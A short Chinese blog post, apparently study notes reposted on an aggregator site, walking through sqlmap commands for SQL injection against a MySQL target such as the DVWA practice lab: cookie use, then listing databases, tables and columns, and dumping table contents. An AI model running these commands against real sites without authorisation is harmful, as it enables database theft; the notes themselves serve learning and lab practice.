首页 > 数据库技术 > 详细

SQLMAP学习笔记2 Mysql数据库注入

时间:2018-06-17 13:26:20      阅读:179      评论:0      收藏:0      [点我收藏+]

SQLMAP学习笔记2 Mysql数据库注入


 

 


 

注入流程

 


 

(如果网站需要登录,就要用到cookie信息,通过F12开发者工具获取cookie信息)

sqlmap -u "URL" --cookie="名称=值; 名称=值" --batch   #其中-u参数指定目标URL,--batch参数采用默认选项、不进行询问。

结果发现是可注入的

技术分享图片

1、sqlmap -u "url" --dbs # 获取数据库;

2、sqlmap -u "url"  -D 指定的数据库  --tables --batch  #通过-D参数指定为dvwa数据库,--tables参数查看所有的表;

3、sqlmap -u "url" -D 指定的数据库 -T 指定的表 --columns # 通过-T参数指定表为users,--columns查看该表的所有列;

4、sqlmap -u "url" -D 指定的数据库 -T 指定的表 --dump # 直接用--dump参数将所有列的信息都列出来;

技术分享图片


 

see you

 


 

 

 

 

SQLMAP学习笔记2 Mysql数据库注入

原文:https://www.cnblogs.com/WYQ-grasslands/p/9192562.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!